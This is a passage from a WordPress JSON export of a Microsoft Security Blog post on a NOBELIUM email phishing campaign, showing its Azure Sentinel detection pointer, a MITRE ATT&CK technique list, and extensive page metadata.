Sentinel<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"nobelium-exploitation-search-using-azure-sentinel\">NOBELIUM exploitation search using Azure Sentinel<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this&nbsp;<a href=\"https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/NOBELIUM_IOCsMay2021.yaml\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub repository<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"mitre-att-ck-techniques-observed\">MITRE ATT&amp;CK techniques observed<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This threat makes use of attacker techniques documented in the&nbsp;<a href=\"https:\/\/attack.mitre.org\/\" target=\"_blank\" rel=\"noreferrer noopener\">MITRE ATT&amp;CK framework<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"initial-access\">Initial access<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1566\/003\/\" target=\"_blank\" rel=\"noreferrer noopener\">T1566.003 Phishing: Spearphishing via Service<\/a>\u2014NOBELIUM used the legitimate mass mailing service, Constant Contact to send their emails.<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1566\/002\/\" target=\"_blank\" rel=\"noreferrer noopener\">T1566.002 &nbsp;Phishing: Spearphishing Link<\/a>\u2014The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"execution\">Execution<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1610\/\" target=\"_blank\" rel=\"noreferrer noopener\">T1610 Deploy Container<\/a>\u2014Payload is delivered via an ISO file which is mounted on target computers.<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1204\/001\/\" target=\"_blank\" rel=\"noreferrer noopener\">T1204.001 User Execution: Malicious Link<\/a>\u2014Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"command-and-control\">Command and control<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1071\/001\/\">T1071.001 Application Layer Protocol: Web Protocols<\/a>\u2014Cobalt Strike Beacons call out to attacker infrastructure via port 443.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To learn more about Microsoft Security solutions,&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/business\" target=\"_blank\" rel=\"noreferrer noopener\">visit our website<\/a>. Bookmark the&nbsp;<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\" target=\"_blank\" rel=\"noreferrer noopener\">Security blog<\/a>&nbsp;to keep up with our expert coverage on security matters. Also, follow us at&nbsp;<a href=\"https:\/\/twitter.com\/@MSFTSecurity\" target=\"_blank\" rel=\"noreferrer noopener\">@MSFTSecurity<\/a>&nbsp;for the latest news and updates on cybersecurity.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation.<\/p>\n","protected":false},"author":106,"featured_media":131248,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ms_queue_id":[],"ep_exclude_from_search":false,"_classifai_error":"","_classifai_text_to_speech_error":"","_alt_title":"","ms-ems-related-posts":[93658,93028,92604],"footnotes":""},"post_tag":[3828],"threat-intelligence":[],"content-type":[3662],"job-role":[],"product":[3690,3694,3695,3693],"topic":[3671],"coauthors":[3380],"class_list":["post-93630","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-midnight-blizzard-nobelium","content-type-news","product-microsoft-defender","product-microsoft-defender-for-endpoint","product-microsoft-defender-for-office-365","product-microsoft-defender-xdr","topic-email-security","review-flag-1694638265-576","review-flag-1-1694638265-354","review-flag-2-1694638266-864","review-flag-3-1694638266-241","review-flag-new-1694638263-340"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog\" \/>\n<meta property=\"og:description\" content=\"Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\" \/>\n<meta property=\"og:site_name\" content=\"Microsoft Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-28T00:00:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-07-03T11:59:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/nobelium-social.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1104\" \/>\n\t<meta property=\"og:image:height\" content=\"554\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Microsoft Threat Intelligence\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/nobelium-social.png\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Microsoft Threat Intelligence\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\"},\"author\":[{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/microsoft-security-threat-intelligence\/\",\"@type\":\"Person\",\"@name\":\"Microsoft Threat Intelligence\"}],\"headline\":\"New sophisticated email-based attack from NOBELIUM\",\"datePublished\":\"2021-05-28T00:00:50+00:00\",\"dateModified\":\"2025-07-03T11:59:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\"},\"wordCount\":2616,\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp\",\"keywords\":[\"Midnight Blizzard (NOBELIUM)\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\",\"name\":\"New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp\",\"datePublished\":\"2021-05-28T00:00:50+00:00\",\"dateModified\":\"2025-07-03T11:59:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp\",\"width\":1200,\"height\":801,\"caption\":\"Photo of building architecture and urban greenery\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"New sophisticated email-based attack from NOBELIUM\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"name\":\"Microsoft Security Blog\",\"description\":\"Expert coverage of cybersecurity topics\",\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\",\"name\":\"Microsoft Security Blog\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"width\":512,\"height\":512,\"caption\":\"Microsoft Security Blog\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/dce7a42a3a4e63a3350e523c420a4ad1\",\"name\":\"Emma Jones\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=gd8de7ce2349693784c52e03d78a1422c\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=g\",\"caption\":\"Emma Jones\"},\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/v-coujones\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","og_locale":"en_US","og_type":"article","og_title":"New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog","og_description":"Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware, and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation.","og_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","og_site_name":"Microsoft Security Blog","article_published_time":"2021-05-28T00:00:50+00:00","article_modified_time":"2025-07-03T11:59:18+00:00","og_image":[{"width":1104,"height":554,"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/nobelium-social.png","type":"image\/png"}],"author":"Microsoft Threat Intelligence","twitter_card":"summary_large_image","twitter_image":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/nobelium-social.png","twitter_misc":{"Written by":"Microsoft Threat Intelligence","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#article","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/"},"author":[{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/microsoft-security-threat-intelligence\/","@type":"Person","@name":"Microsoft Threat Intelligence"}],"headline":"New sophisticated email-based attack from NOBELIUM","datePublished":"2021-05-28T00:00:50+00:00","dateModified":"2025-07-03T11:59:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/"},"wordCount":2616,"publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp","keywords":["Midnight Blizzard (NOBELIUM)"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/","name":"New sophisticated email-based attack from NOBELIUM | Microsoft Security Blog","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp","datePublished":"2021-05-28T00:00:50+00:00","dateModified":"2025-07-03T11:59:18+00:00","breadcrumb":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2021\/05\/NOBELIUM-email-based-attack.webp","width":1200,"height":801,"caption":"Photo of building architecture and urban greenery"},{"@type":"BreadcrumbList","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/05\/27\/new-sophisticated-email-based-attack-from-nobelium\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/"},{"@type":"ListItem","position":2,"name":"New sophisticated email-based attack from NOBELIUM"}]},{"@type":"WebSite","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","name":"Microsoft Security Blog","description":"Expert coverage of cybersecurity topics","publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization","name":"Microsoft Security Blog","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","width":512,"height":512,"caption":"Microsoft Security Blog"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/dce7a42a3a4e63a3350e523c420a4ad1","name":"Emma Jones","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=gd8de7ce2349693784c52e03d78a1422c","url":"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d34f702c8adc55c90905670a2ca63f412e583f0733513a580f9fbe70cf12fe2d?s=96&d=microsoft&r=g","caption":"Emma Jones"},"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/v-coujones\/"}]}},"bloginabox_animated_featured_image":null,"bloginabox_display_generated_audio":false,"distributor_meta":false,"distributor_terms":false,"distributor_media":false,"distributor_original_site_name":"Microsoft Security Blog","distributor_original_site_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog","push-errors":false,"_links":{"self":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/93630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/users\/106"}],"replies":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/comments?post=93630"}],"version-history":[{"count":5,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/93630\/revisions"}],"predecessor-version":[{"id":140996,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/93630\/revisions\/140996"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media\/131248"}],"wp:attachment":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media?parent=93630"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/post_tag?post=93630"},{"taxonomy":"threat-intelligence","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/threat-intelligence?post=93630"},{"taxonomy":"content-type","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/content-type?post=93630"},{"taxonomy":"job-role","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/job-role?post=93630"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/product?post=93630"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/topic?post=93630"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/coauthors?post=93630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}